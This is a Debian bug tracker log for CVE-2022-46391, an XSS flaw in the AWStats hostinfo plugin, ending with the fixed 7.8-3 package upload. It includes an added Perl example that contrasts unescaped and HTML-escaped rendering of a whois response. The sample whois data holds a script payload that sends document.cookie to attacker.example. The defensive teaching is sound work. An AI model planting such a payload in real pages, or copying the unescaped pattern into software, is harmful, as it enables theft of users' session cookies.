awstats: CVE-2022-46391: XSS due to printing response from Net::XWhois without proper checks

Debian Bug report logs - #1025410

Reported by: Salvatore Bonaccorso <carnil@debian.org>

Date: Sun, 4 Dec 2022 09:33:02 UTC

Severity: important

Tags: security, upstream

Found in version awstats/7.8-2

Fixed in version awstats/7.8-3

Done: Salvatore Bonaccorso <carnil@debian.org>

Forwarded to https://github.com/eldy/AWStats/pull/226



Report forwarded to debian-bugs-dist@lists.debian.org, carnil@debian.org, team@security.debian.org, Debian QA Group <packages@qa.debian.org>:
Bug#1025410; Package src:awstats. (Sun, 04 Dec 2022 09:33:04 GMT)


Acknowledgement sent to Salvatore Bonaccorso <carnil@debian.org>:
New Bug report received and forwarded. Copy sent to carnil@debian.org, team@security.debian.org, Debian QA Group <packages@qa.debian.org>. (Sun, 04 Dec 2022 09:33:04 GMT)


Message #5 received at submit@bugs.debian.org:

From: Salvatore Bonaccorso <carnil@debian.org>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: awstats: CVE-2022-46391: XSS due to printing response from Net::XWhois without proper checks
Date: Sun, 04 Dec 2022 10:29:18 +0100
Source: awstats
Version: 7.8-2
Severity: important
Tags: security upstream
Forwarded: https://github.com/eldy/AWStats/pull/226
X-Debbugs-Cc: carnil@debian.org, Debian Security Team <team@security.debian.org>

Hi,

The following vulnerability was published for awstats.

CVE-2022-46391[0]:
| AWStats 7.x through 7.8 allows XSS in the hostinfo plugin due to
| printing a response from Net::XWhois without proper checks.


If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2022-46391
    https://www.cve.org/CVERecord?id=CVE-2022-46391
[1] https://github.com/eldy/AWStats/pull/226

Regards,
Salvatore
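
The CVE text quoted above gives the whole mechanism: the hostinfo plugin prints a whois response into its HTML output, so whoever controls the whois record for a host that shows up in the logs controls markup that lands in the report viewer's browser. The Perl below is an added example, not AWStats code and not the change in PR #226; it shows the unchecked pattern beside an escaped rendering. The whois text is constructed, and render_unsafe, render_safe, html_escape and contains_tag are names chosen for this illustration.

```perl
#!/usr/bin/perl
# Added example (not AWStats code, not the PR #226 patch): why a whois
# response must be HTML-escaped before it is printed into a web page.
use strict;
use warnings;

# Constructed whois response. In the real plugin this text comes back from a
# remote whois server (via Net::XWhois), so it is attacker-controlled input.
my $whois_raw = <<'END';
Domain Name: EXAMPLE.COM
Registrant Name: <script>document.location='https://attacker.example/?c='+document.cookie</script>
Registrant Organization: Example & Sons "Ltd"
END

# Vulnerable pattern: untrusted text interpolated into HTML as-is.
sub render_unsafe {
    my ($raw) = @_;
    return "<pre>$raw</pre>";
}

# Escape the five HTML-significant characters. '&' must go first, otherwise
# the entities produced by the later substitutions would be double-escaped.
# (HTML::Entities::encode_entities does the same; written out here so the
# example needs only core Perl.)
sub html_escape {
    my ($s) = @_;
    $s =~ s/&/&amp;/g;
    $s =~ s/</&lt;/g;
    $s =~ s/>/&gt;/g;
    $s =~ s/"/&quot;/g;
    $s =~ s/'/&#39;/g;
    return $s;
}

# Hardened pattern: escape before the string touches the page.
sub render_safe {
    my ($raw) = @_;
    return "<pre>" . html_escape($raw) . "</pre>";
}

# A check a test suite could keep: apart from the <pre> wrapper we add
# ourselves, no tag may survive in the rendered output. Returns 1 if one does.
sub contains_tag {
    my ($html) = @_;
    $html =~ s{^<pre>|</pre>$}{}g;
    return $html =~ /<[a-zA-Z\/!]/ ? 1 : 0;
}

print "--- unsafe ---\n", render_unsafe($whois_raw), "\n";
print "--- safe ---\n",   render_safe($whois_raw),   "\n";
printf "unsafe output contains a tag: %d\n", contains_tag(render_unsafe($whois_raw));
printf "safe output contains a tag:   %d\n", contains_tag(render_safe($whois_raw));
```

Run with `perl` and compare the two blocks: the unsafe rendering carries the script element through intact (contains_tag reports 1), the escaped one shows it as literal text (`&lt;script&gt;...`, contains_tag reports 0). Escaping at the point of output is the right place for the fix, because the whois text is only ever displayed; stripping tags from the response instead would also work but leaves a bypass risk if the stripper and the browser disagree on what a tag is.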



Reply sent to Salvatore Bonaccorso <carnil@debian.org>:
You have taken responsibility. (Sun, 04 Dec 2022 20:39:03 GMT)


Notification sent to Salvatore Bonaccorso <carnil@debian.org>:
Bug acknowledged by developer. (Sun, 04 Dec 2022 20:39:04 GMT)


Message #10 received at 1025410-close@bugs.debian.org:

From: Debian FTP Masters <ftpmaster@ftp-master.debian.org>
To: 1025410-close@bugs.debian.org
Subject: Bug#1025410: fixed in awstats 7.8-3
Date: Sun, 04 Dec 2022 20:34:40 +0000
Source: awstats
Source-Version: 7.8-3
Done: Salvatore Bonaccorso <carnil@debian.org>

We believe that the bug you reported is fixed in the latest version of
awstats, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 1025410@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Salvatore Bonaccorso <carnil@debian.org> (supplier of updated awstats package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Sun, 04 Dec 2022 20:52:31 +0100
Source: awstats
Architecture: source
Version: 7.8-3
Distribution: unstable
Urgency: medium
Maintainer: Debian QA Group <packages@qa.debian.org>
Changed-By: Salvatore Bonaccorso <carnil@debian.org>
Closes: 1025410
Changes:
 awstats (7.8-3) unstable; urgency=medium
 .
   * QA upload.
 .
   [ Debian Janitor ]
   * Bump debhelper from old 12 to 13.
   * Avoid invoking dpkg-parsechangelog.
 .
   [ Salvatore Bonaccorso ]
   * fix cross site scripting (CVE-2022-46391) (Closes: #1025410)
Checksums-Sha1: 
 fd1cb62ef07e8c0d449641ee85dfe6dadf7bb945 1989 awstats_7.8-3.dsc
 0bce1381e702ed768a7512be365e763b6ca86319 37740 awstats_7.8-3.debian.tar.xz
Checksums-Sha256: 
 6c4714b2fe86c072114bcd582586dc8b7089360c0d6a93d9eae7c779415d46f1 1989 awstats_7.8-3.dsc
 ebeeabfa6bca4834262751d9ff4794c5f93cb0f24aea1b851f6fed89f8c44017 37740 awstats_7.8-3.debian.tar.xz
Files: 
 bddd612233834eceb06e0db1ac21cb23 1989 web optional awstats_7.8-3.dsc
 e419440cea2cc21f9c0309cfee6d9560 37740 web optional awstats_7.8-3.debian.tar.xz

-----BEGIN PGP SIGNATURE-----

iQKmBAEBCgCQFiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmOM/MVfFIAAAAAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQSHGNhcm5pbEBk
ZWJpYW4ub3JnAAoJEAVMuPMTQ89EHeUP/34rf3ihPSqqSQfWyovHr0KKVOs5SBLF
wjWYJ/gY2hRzb+Po4NCYjYE6ND2+d72Q+r7B4u6yE6/O8N6uP6w+OJDkHTWiFedO
dOFhlrV8oEo0cH/OehTiru8fh85fbhwb/001kZ/dNsurqJh98xeJV18gpVGI+0Pc
h4v7ciGgk/SD51RMVHAErggPnMwWO112cnNhqXWYYGg3s3uKMVUEaNUh47aiySqR
HuoIJq28Djn52YwTI+TQIhmgzftRJdEU+c6NDWswz6u9DIbpVDahG7F/jMeeNu4w
H3JoXLd2FJJgCbsJZVx2LNeib2E1f3zQRdVxdxcGkKHhy20w27vQJtqv/PUst3uP
rz47PfBSKpOLGDprcpJN04PaWvRtq+Hse+j4exHKDhBuB1x159qRTG43/A49cWvc
FBPzMmQMuy+ZMZn+VrnPFXkaRyEdmM8iI6STUTXqkKyXLM/p5tP5HEHEgClF+wJw
xL1/ecfyEYSz8eYK6pDTDpjpi7dtvv7a9q+2rNNmFry6fN9D5gEt+I0k8hCDhitL
8gGOc3+8SovUIkYbBYsxMvxSG3xwxqHrF7PMqF5Zqd2sJp2/cMJ+oSpUY4tzzH7N
bqaQ8vTsJ29t2ZZHulZ0/M7OAwDKgcmR3kHi8m71etCvRHbs3X3S9eRypEJlpwOd
wFlmjmMeuhij
=E4yc
-----END PGP SIGNATURE-----






Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Mon Dec 5 07:18:15 2022; Machine Name: buxtehude
